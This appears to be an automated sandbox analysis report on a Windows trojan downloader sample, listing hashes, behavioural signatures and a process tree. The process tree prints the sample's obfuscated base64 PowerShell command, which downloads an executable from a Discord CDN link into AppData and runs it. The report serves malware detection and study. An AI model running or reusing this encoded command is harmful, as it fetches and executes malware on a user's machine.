Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24-12-2023 10:18
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe
Resource
win10v2004-20231215-en
General
-
Target
SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe
-
Size
6KB
-
MD5
d0c32ff1da809dda5724a90a5dd80ff5
-
SHA1
18f52952e62edb4ef0d31fa3b1aecb8678ccde1a
-
SHA256
1a2e7d970dea301dc3480138506bf76dc01f82150ed8224a3f44136a777ce3a4
-
SHA512
714cc6a0838f4dbb768632b4697c69f721badf0ee8169277c85a9cbdceff0fa668355767c7c8790ee605566f2deeeb87d4a7415bd34a3b8fd151cb4b6a54d3cb
-
SSDEEP
96:LBuY79i8CFy0sMxb06jhIUqku4/tzNtUqEu45K/9gad3ojorl:LBuO9inFRreUqkuIhNtUqEu7Vgadv
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1624 powershell.exe 4 1624 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1624 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2988 wrote to memory of 1624 2988 SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe 29 PID 2988 wrote to memory of 1624 2988 SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe 29 PID 2988 wrote to memory of 1624 2988 SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgAMAA2ADYANgAzADYAOQA3ADIAMwA2ADAAMAA4AC8AMQAxADgANwA4ADAANgA3ADUANgA0ADAAOAAxADQANwA5ADgAOAAvAG0AdQBjAGsAXwBpAHQAcAAuAGUAeABlAD8AZQB4AD0ANgA1ADkAOAAzAGEAMwBmACYAaQBzAD0ANgA1ADgANQBjADUAMwBmACYAaABtAD0ANwA0ADgAZgA4AGIAZgBiADMAZABmADAAOQBmADYAOQA1ADgAMABkAGEANQA4ADYAMwAyADEANQBhADAAOABhAGIAMgAzAGEAMwA5AGEAMgBmADYANQA2ADMAOQBmAGMAYQA4AGYAMwBkADEAYgA2ADUAYQBiAGEAZABlADkANgAmACcALAAgADwAIwB2AHIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAagBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAdwBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAKQA8ACMAdABnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBrAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAaAByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHEAbAByACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624
-